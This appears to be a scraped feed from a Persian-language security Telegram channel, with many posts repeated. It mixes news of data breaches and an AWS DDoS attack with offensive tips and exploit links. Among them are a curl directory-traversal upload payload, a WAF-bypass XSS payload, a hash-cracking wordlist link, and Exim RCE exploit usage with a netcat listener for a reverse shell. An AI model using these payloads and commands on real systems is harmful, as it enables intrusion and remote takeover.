برگه تقلبی در خصوص کشف آسیب پذیری هایی که در PHP به وجود می آیند.
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet/blob/master/README.md
#web
#PHP
#WhiteBox
#CheatSheet
@sec_nerd
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet/blob/master/README.md
#web
#PHP
#WhiteBox
#CheatSheet
@sec_nerd
GitHub
dustyfresh/PHP-vulnerability-audit-cheatsheet
This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function. - dustyfresh/P...
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است
https://bugs.php.net/bug.php?id=78599
و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند
اکسپلویت:
https://github.com/neex/phuip-fpizdam
#php
#nginx
#rce
@sec_nerd
https://bugs.php.net/bug.php?id=78599
و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند
اکسپلویت:
https://github.com/neex/phuip-fpizdam
#php
#nginx
#rce
@sec_nerd
GitHub
GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043
Exploit for CVE-2019-11043. Contribute to neex/phuip-fpizdam development by creating an account on GitHub.
نحوه اکسپلویت کردن آسیب پذیری Directory Traversal با استفاده از curl
curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"
#terminal
#web
#tricks
@sec_nerd
curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"
#terminal
#web
#tricks
@sec_nerd
جمع آوری زیردامنه های وبسایت با استفاده از ابزاری که از api وبسایت whoxy.com بهره میبرد
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
۱۷۹ گیگابایت از اطلاعات کارکنان ارتش امریکا بر روی یک سرور ابری آمازون بصورت محافظت نشده قرار داشت.
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
Security Boulevard
Sensitive US government and military travel details left exposed online
Significant amounts of sensitive data about employees of the US government military personnel data could now be in the public domain following its exposure in a data leak. Israeli security researchers Noam Rotem and Ran Locar discovered 179 GB of data on…
آسیب پذیری Cross Context Scripting(XCS) و نحوه اکسپلویت
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
www.slideshare.net
Cross Context Scripting attacks & exploitation
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into …
امنیت اطلاعات
آسیب پذیری Cross Context Scripting(XCS) و نحوه اکسپلویت https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation #web #XSS #XCS @sec_nerd
Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution
https://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html?m=1
#web
#XSS
#XCS
@sec_nerd
https://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html?m=1
#web
#XSS
#XCS
@sec_nerd
blog.malerisch.net
Maxthon - Cross Context Scripting (XCS) - about:history - Remote Code Execution
A blog about security research, web application security, software bugs and exploits.
ارسال بیش از ۵۰ هزار کاراکتر در پارامترهای POST
استفاده از مقادیری که عدد اویلر (e) دارند
#sqli
#bugbounty
#web
#pentest
@sec_nerd
استفاده از مقادیری که عدد اویلر (e) دارند
#sqli
#bugbounty
#web
#pentest
@sec_nerd
اطلاعات بیش از ۷ میلیون عضو سرویس ابری adobe بصورت محافظت نشده در دسترس عموم قرار داشت.
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
این دیتابیس مربوط به سرویس Adobe Creative Cloud بود که حاوی مشخصات کاربران سرویس های مختلف adobe از جمله آدرس ایمیل، کشور، وضعیت پرداخت و ... می باشد.
در حال حاضر این دیتابیس که از نوع elasticsearch است امن شده.
اطلاعات بیشتر در خصوص این مشکل و تایم لاین کشف و برطرف سازی آن:
https://www.comparitech.com/blog/information-security/7-million-adobe-creative-cloud-accounts-exposed-to-the-public/
#breach
#adobe
#news
@sec_nerd
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
"Once a vulnerable target has been identified, attackers can send specially crafted requests by appending '?a=' in the URL to a vulnerable web server."
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd
https://www.zdnet.com/article/nasty-php7-remote-code-execution-bug-exploited-in-the-wild/
#php
#nginx
#rce
@sec_nerd
imperva WAF bypass
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
#waf
#bugbounty
#imperva
@sec_nerd
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
#waf
#bugbounty
#imperva
@sec_nerd
وردلیست ۸ گیگابایتی مناسب برای کرک هش
https://gofile.io/?c=NHXEGm
حجم کمپرس شده 2.7 گیگ
#hash
#crack
@sec_nerd
https://gofile.io/?c=NHXEGm
حجم کمپرس شده 2.7 گیگ
#hash
#crack
@sec_nerd
exploit.py
2.2 KB
انتشار اکسپلویت اجرای دستور از راه دور بر روی سرویس exim با شناسه CVE-2019-10149
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
نسخه های آسیب پذیر: از 4.87 تا 4.91
کارکرد:
روی سرور مهاجم netcat به این صورت:
nc -lvp 9000
و اجرای اسکریپت:
python ./exploit.py --rhost example.com --rport 25 --lhost 10.10.10.100 --lport 9000
https://github.com/Diefunction/CVE-2019-10149
#exim
#rce
#exploit
@sec_nerd
👍1
۵ روز پیش سرویس ابری آمازون هدف حملات گسترده DDOS از سوی عوامل ناشناخته قرار گرفت.
این حملات باعث از کار افتادن قسمتی از سرویس های آمازون به مدت ۸ ساعت شد. از جمله این سرویس ها میتوان به S3 و RDS و SQS و CloudFront و نیز EC2 و ELB اشاره کرد.
از جمله شرکتهایی که از این خدمات بهره میبرند DigitalOcean است که در طی این حمله دچار مشکل شد.
ناتوانی آمازون در جلوگیری از این حمله آن هم به مدت ۸ ساعت در حالی اتفاق افتاد که این شرکت در سرویس های خود Shield Advanced را دارد که با پلن های مختلف مدعی ایجاد امنیت در برابر حملات DDOS است.
منبع:
https://www.hackread.com/aws-ddos-attacks-lasted-8-hours/
#news
#amazon
#ddos
@sec_nerd
این حملات باعث از کار افتادن قسمتی از سرویس های آمازون به مدت ۸ ساعت شد. از جمله این سرویس ها میتوان به S3 و RDS و SQS و CloudFront و نیز EC2 و ELB اشاره کرد.
از جمله شرکتهایی که از این خدمات بهره میبرند DigitalOcean است که در طی این حمله دچار مشکل شد.
ناتوانی آمازون در جلوگیری از این حمله آن هم به مدت ۸ ساعت در حالی اتفاق افتاد که این شرکت در سرویس های خود Shield Advanced را دارد که با پلن های مختلف مدعی ایجاد امنیت در برابر حملات DDOS است.
منبع:
https://www.hackread.com/aws-ddos-attacks-lasted-8-hours/
#news
#amazon
#ddos
@sec_nerd
HackRead
AWS hit by massive DDoS attacks that lasted 8 hours
Like us on Facebook @ /HackRead
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
داکر مخصوص آسیب پذیری php-fpm و nginx برای آزمایش آسیب پذیری RCE با شناسه CVE-2019-11043
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
GitHub
GitHub - akamajoris/CVE-2019-11043-Docker
Contribute to akamajoris/CVE-2019-11043-Docker development by creating an account on GitHub.